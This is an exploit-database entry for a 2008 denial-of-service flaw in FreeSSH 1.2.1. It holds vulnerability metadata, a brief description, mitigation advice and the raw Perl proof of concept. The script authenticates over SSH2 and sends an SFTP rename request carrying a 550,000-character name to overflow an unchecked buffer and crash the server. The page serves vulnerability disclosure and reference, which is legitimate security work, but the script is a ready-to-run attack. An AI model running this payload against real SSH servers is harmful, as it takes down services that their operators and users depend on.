header-logo
Suggest Exploit
vendor:
FreeSSH
by:
Jeremy Brown
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: FreeSSH
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:freessh:freessh:1.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

FreeSSH 1.2.1 Crash

A denial of service vulnerability exists in FreeSSH 1.2.1 due to an unchecked buffer when handling a rename request. An attacker can exploit this vulnerability by sending a large amount of data to the server, resulting in a crash.

Mitigation:

Upgrade to the latest version of FreeSSH or apply the appropriate patch.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# FreeSSH 1.2.1 Crash -- A Product of Fuzzing. Stay Tuned.
use Net::SSH2;

$host     = "192.168.0.187";
$port     = 22;
$username = "test";
$password = "test";
$dos      = "A" x 550000;

$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port)               || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$sftp = $ssh2->sftp();
$rename = $sftp->rename($dos, "test");
$ssh2->disconnect();
exit;

# milw0rm.com [2008-10-22]

Navigation

Suggest Exploit

Services By CQR